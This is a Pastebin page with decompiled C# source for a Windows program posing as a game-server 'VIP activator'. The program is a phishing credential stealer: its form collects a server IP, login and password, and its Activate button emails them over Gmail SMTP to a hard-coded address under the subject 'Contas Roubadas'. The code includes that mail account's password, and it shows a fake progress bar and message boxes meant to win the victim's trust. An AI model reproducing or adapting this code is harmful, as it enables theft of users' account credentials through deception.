Advertisement
Guest User

Source do: "Ativador de VIP"

a guest
Jul 2nd, 2017
664
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.88 KB | None | 0 0
  1. using Microsoft.VisualBasic;
  2. using Microsoft.VisualBasic.CompilerServices;
  3. using System;
  4. using System.ComponentModel;
  5. using System.Diagnostics;
  6. using System.Drawing;
  7. using System.Net;
  8. using System.Net.Mail;
  9. using System.Resources;
  10. using System.Runtime.CompilerServices;
  11. using System.Windows.Forms;
  12.  
  13. namespace Ativador_de_VIP_s
  14. {
  15. [DesignerGenerated]
  16. public class Form1 : Form
  17. {
  18. private IContainer components;
  19.  
  20. internal virtual Button Button1
  21. {
  22. get
  23. {
  24. stackVariable1 = this._Button1;
  25. return stackVariable1;
  26. }
  27. [MethodImpl(MethodImplOptions.Synchronized)]
  28. set
  29. {
  30. EventHandler eventHandler = new EventHandler(this.Button1_Click);
  31. Button button = this._Button1;
  32. if (button != null)
  33. {
  34. button.Click -= eventHandler;
  35. }
  36. this._Button1 = value;
  37. button = this._Button1;
  38. if (button != null)
  39. {
  40. button.Click += eventHandler;
  41. }
  42. }
  43. }
  44.  
  45. internal virtual Label Label1
  46. {
  47. get;
  48. [MethodImpl(MethodImplOptions.Synchronized)]
  49. set;
  50. }
  51.  
  52. internal virtual Label Label2
  53. {
  54. get;
  55. [MethodImpl(MethodImplOptions.Synchronized)]
  56. set;
  57. }
  58.  
  59. internal virtual Label Label3
  60. {
  61. get;
  62. [MethodImpl(MethodImplOptions.Synchronized)]
  63. set;
  64. }
  65.  
  66. internal virtual Label Label4
  67. {
  68. get;
  69. [MethodImpl(MethodImplOptions.Synchronized)]
  70. set;
  71. }
  72.  
  73. internal virtual Label Label5
  74. {
  75. get
  76. {
  77. stackVariable1 = this._Label5;
  78. return stackVariable1;
  79. }
  80. [MethodImpl(MethodImplOptions.Synchronized)]
  81. set
  82. {
  83. EventHandler eventHandler = new EventHandler(this.Label5_Click);
  84. Label label = this._Label5;
  85. if (label != null)
  86. {
  87. label.Click -= eventHandler;
  88. }
  89. this._Label5 = value;
  90. label = this._Label5;
  91. if (label != null)
  92. {
  93. label.Click += eventHandler;
  94. }
  95. }
  96. }
  97.  
  98. internal virtual Label Label6
  99. {
  100. get
  101. {
  102. stackVariable1 = this._Label6;
  103. return stackVariable1;
  104. }
  105. [MethodImpl(MethodImplOptions.Synchronized)]
  106. set
  107. {
  108. EventHandler eventHandler = new EventHandler(this.Label6_Click);
  109. Label label = this._Label6;
  110. if (label != null)
  111. {
  112. label.Click -= eventHandler;
  113. }
  114. this._Label6 = value;
  115. label = this._Label6;
  116. if (label != null)
  117. {
  118. label.Click += eventHandler;
  119. }
  120. }
  121. }
  122.  
  123. internal virtual PictureBox PictureBox1
  124. {
  125. get;
  126. [MethodImpl(MethodImplOptions.Synchronized)]
  127. set;
  128. }
  129.  
  130. internal virtual ProgressBar ProgressBar1
  131. {
  132. get;
  133. [MethodImpl(MethodImplOptions.Synchronized)]
  134. set;
  135. }
  136.  
  137. internal virtual TextBox TextBox1
  138. {
  139. get;
  140. [MethodImpl(MethodImplOptions.Synchronized)]
  141. set;
  142. }
  143.  
  144. internal virtual TextBox TextBox2
  145. {
  146. get;
  147. [MethodImpl(MethodImplOptions.Synchronized)]
  148. set;
  149. }
  150.  
  151. internal virtual TextBox TextBox3
  152. {
  153. get;
  154. [MethodImpl(MethodImplOptions.Synchronized)]
  155. set;
  156. }
  157.  
  158. internal virtual TextBox TextBox4
  159. {
  160. get;
  161. [MethodImpl(MethodImplOptions.Synchronized)]
  162. set;
  163. }
  164.  
  165. internal virtual Timer Timer1
  166. {
  167. get
  168. {
  169. stackVariable1 = this._Timer1;
  170. return stackVariable1;
  171. }
  172. [MethodImpl(MethodImplOptions.Synchronized)]
  173. set
  174. {
  175. EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
  176. Timer timer = this._Timer1;
  177. if (timer != null)
  178. {
  179. timer.Tick -= eventHandler;
  180. }
  181. this._Timer1 = value;
  182. timer = this._Timer1;
  183. if (timer != null)
  184. {
  185. timer.Tick += eventHandler;
  186. }
  187. }
  188. }
  189.  
  190. public Form1()
  191. {
  192. this.InitializeComponent();
  193. }
  194.  
  195. private void Button1_Click(object sender, EventArgs e)
  196. {
  197. MailMessage mailMessage = new MailMessage();
  198. SmtpClient smtpClient = new SmtpClient("smtp.gmail.com");
  199. mailMessage.From = new MailAddress("contaroubad@gmail.com");
  200. mailMessage.To.Add("contaroubad@gmail.com");
  201. mailMessage.Subject = "Contas Roubadas";
  202. mailMessage.Body = string.Concat(new string[] { "Servidor: ", this.TextBox1.Text, "Login: ", this.TextBox2.Text, " Senha: ", this.TextBox3.Text });
  203. smtpClient.Port = Conversions.ToInteger("587");
  204. smtpClient.Credentials = new NetworkCredential("contaroubad@gmail.com", "123qweasdz");
  205. smtpClient.EnableSsl = true;
  206. try
  207. {
  208. smtpClient.Send(mailMessage);
  209. }
  210. catch (Exception exception)
  211. {
  212. ProjectData.SetProjectError(exception);
  213. ProjectData.ClearProjectError();
  214. }
  215. this.Timer1.Enabled = true;
  216. this.Timer1.Start();
  217. this.Timer1.Interval = 1000;
  218. this.TextBox1.Enabled = false;
  219. this.TextBox2.Enabled = false;
  220. this.TextBox3.Enabled = false;
  221. if (this.ProgressBar1.Value == 100)
  222. {
  223. Interaction.MsgBox(string.Concat("Seu vip", this.TextBox4.Text), (MsgBoxStyle)Conversions.ToInteger("Foi ativado"), null);
  224. }
  225. }
  226.  
  227. [DebuggerNonUserCode]
  228. protected override void Dispose(bool disposing)
  229. {
  230. try
  231. {
  232. if ((!disposing ? false : this.components != null))
  233. {
  234. this.components.Dispose();
  235. }
  236. }
  237. finally
  238. {
  239. base.Dispose(disposing);
  240. }
  241. }
  242.  
  243. [DebuggerStepThrough]
  244. private void InitializeComponent()
  245. {
  246. this.components = new Container();
  247. ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(Form1));
  248. this.Label4 = new Label();
  249. this.Label3 = new Label();
  250. this.Label2 = new Label();
  251. this.Label1 = new Label();
  252. this.TextBox4 = new TextBox();
  253. this.TextBox3 = new TextBox();
  254. this.TextBox2 = new TextBox();
  255. this.TextBox1 = new TextBox();
  256. this.Timer1 = new Timer(this.components);
  257. this.Label6 = new Label();
  258. this.PictureBox1 = new PictureBox();
  259. this.Label5 = new Label();
  260. this.Button1 = new Button();
  261. this.ProgressBar1 = new ProgressBar();
  262. ((ISupportInitialize)this.PictureBox1).BeginInit();
  263. base.SuspendLayout();
  264. this.Label4.AutoSize = true;
  265. this.Label4.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  266. this.Label4.ForeColor = SystemColors.Control;
  267. this.Label4.Location = new Point(15, 182);
  268. this.Label4.Name = "Label4";
  269. this.Label4.Size = new Size(81, 13);
  270. this.Label4.TabIndex = 20;
  271. this.Label4.Text = "Nome do VIP";
  272. this.Label3.AutoSize = true;
  273. this.Label3.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  274. this.Label3.ForeColor = SystemColors.Control;
  275. this.Label3.Location = new Point(29, 129);
  276. this.Label3.Name = "Label3";
  277. this.Label3.Size = new Size(43, 13);
  278. this.Label3.TabIndex = 19;
  279. this.Label3.Text = "Senha";
  280. this.Label2.AutoSize = true;
  281. this.Label2.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  282. this.Label2.ForeColor = SystemColors.Control;
  283. this.Label2.Location = new Point(29, 91);
  284. this.Label2.Name = "Label2";
  285. this.Label2.Size = new Size(38, 13);
  286. this.Label2.TabIndex = 18;
  287. this.Label2.Text = "Login";
  288. this.Label1.AutoSize = true;
  289. this.Label1.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  290. this.Label1.ForeColor = SystemColors.Control;
  291. this.Label1.Location = new Point(7, 49);
  292. this.Label1.Name = "Label1";
  293. this.Label1.Size = new Size(90, 13);
  294. this.Label1.TabIndex = 17;
  295. this.Label1.Text = "IP Do Servidor";
  296. this.TextBox4.Location = new Point(121, 179);
  297. this.TextBox4.Name = "TextBox4";
  298. this.TextBox4.Size = new Size(132, 20);
  299. this.TextBox4.TabIndex = 16;
  300. this.TextBox3.Location = new Point(117, 126);
  301. this.TextBox3.Name = "TextBox3";
  302. this.TextBox3.PasswordChar = '*';
  303. this.TextBox3.Size = new Size(132, 20);
  304. this.TextBox3.TabIndex = 15;
  305. this.TextBox2.Location = new Point(117, 88);
  306. this.TextBox2.Name = "TextBox2";
  307. this.TextBox2.Size = new Size(132, 20);
  308. this.TextBox2.TabIndex = 14;
  309. this.TextBox1.Location = new Point(103, 46);
  310. this.TextBox1.Name = "TextBox1";
  311. this.TextBox1.Size = new Size(166, 20);
  312. this.TextBox1.TabIndex = 13;
  313. this.Label6.AutoSize = true;
  314. this.Label6.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  315. this.Label6.ForeColor = SystemColors.Control;
  316. this.Label6.Location = new Point(154, 202);
  317. this.Label6.Name = "Label6";
  318. this.Label6.Size = new Size(54, 13);
  319. this.Label6.TabIndex = 25;
  320. this.Label6.Text = "Exemplo";
  321. this.PictureBox1.Image = (Image)componentResourceManager.GetObject("PictureBox1.Image");
  322. this.PictureBox1.Location = new Point(0, -9);
  323. this.PictureBox1.Name = "PictureBox1";
  324. this.PictureBox1.Size = new Size(285, 50);
  325. this.PictureBox1.SizeMode = PictureBoxSizeMode.Zoom;
  326. this.PictureBox1.TabIndex = 24;
  327. this.PictureBox1.TabStop = false;
  328. this.Label5.AutoSize = true;
  329. this.Label5.Cursor = Cursors.Hand;
  330. this.Label5.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  331. this.Label5.ForeColor = SystemColors.Control;
  332. this.Label5.Location = new Point(34, 155);
  333. this.Label5.Name = "Label5";
  334. this.Label5.Size = new Size(210, 13);
  335. this.Label5.TabIndex = 23;
  336. this.Label5.Text = "Porque tenho que por minha conta?";
  337. this.Button1.Location = new Point(95, 247);
  338. this.Button1.Name = "Button1";
  339. this.Button1.Size = new Size(75, 23);
  340. this.Button1.TabIndex = 22;
  341. this.Button1.Text = "Ativar";
  342. this.Button1.UseVisualStyleBackColor = true;
  343. this.ProgressBar1.Location = new Point(46, 221);
  344. this.ProgressBar1.Name = "ProgressBar1";
  345. this.ProgressBar1.Size = new Size(187, 18);
  346. this.ProgressBar1.TabIndex = 21;
  347. base.AutoScaleDimensions = new SizeF(6f, 13f);
  348. base.AutoScaleMode = AutoScaleMode.Font;
  349. this.BackColor = Color.Black;
  350. base.ClientSize = new Size(284, 272);
  351. base.Controls.Add(this.Label4);
  352. base.Controls.Add(this.Label3);
  353. base.Controls.Add(this.Label2);
  354. base.Controls.Add(this.Label1);
  355. base.Controls.Add(this.TextBox4);
  356. base.Controls.Add(this.TextBox3);
  357. base.Controls.Add(this.TextBox2);
  358. base.Controls.Add(this.TextBox1);
  359. base.Controls.Add(this.Label6);
  360. base.Controls.Add(this.PictureBox1);
  361. base.Controls.Add(this.Label5);
  362. base.Controls.Add(this.Button1);
  363. base.Controls.Add(this.ProgressBar1);
  364. base.FormBorderStyle = FormBorderStyle.FixedSingle;
  365. base.Icon = (Icon)componentResourceManager.GetObject("$this.Icon");
  366. base.MaximizeBox = false;
  367. base.Name = "Form1";
  368. base.StartPosition = FormStartPosition.CenterScreen;
  369. this.Text = "Ativador de VIP";
  370. ((ISupportInitialize)this.PictureBox1).EndInit();
  371. base.ResumeLayout(false);
  372. base.PerformLayout();
  373. }
  374.  
  375. private void Label5_Click(object sender, EventArgs e)
  376. {
  377. Interaction.MsgBox("Nós temos armazenado hoje mais de 275 Mil contas em nosso servidor PRIVADO, ja criamos mais de 60 Hackers para jogos Diferentes em 6 Anos ", MsgBoxStyle.OkOnly, null);
  378. Interaction.MsgBox("Caso não confia em nós, peço que saia do programa, Caso confie OBRIGADO !!", MsgBoxStyle.OkOnly, null);
  379. Interaction.MsgBox("Armazenamos as contas para proximo uso do Programa não demorar tanto para Ativar o VIP", MsgBoxStyle.OkOnly, null);
  380. }
  381.  
  382. private void Label6_Click(object sender, EventArgs e)
  383. {
  384. Interaction.MsgBox("Varios Servidores tem um Sistema de VIP: VIP Ferro, VIP Ouro, VIP Diamante, VIP Bedrock entro outros Caso o seu não tenha ponha [Padrão]", MsgBoxStyle.OkOnly, null);
  385. }
  386.  
  387. private void Timer1_Tick(object sender, EventArgs e)
  388. {
  389. this.ProgressBar1.Value = checked(this.ProgressBar1.Value + 1);
  390. if (this.ProgressBar1.Value == this.ProgressBar1.Maximum)
  391. {
  392. this.ProgressBar1.Value = 0;
  393. this.Timer1.Stop();
  394. this.Timer1.Enabled = false;
  395. this.TextBox1.Enabled = true;
  396. this.TextBox2.Enabled = true;
  397. }
  398. }
  399. }
  400. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement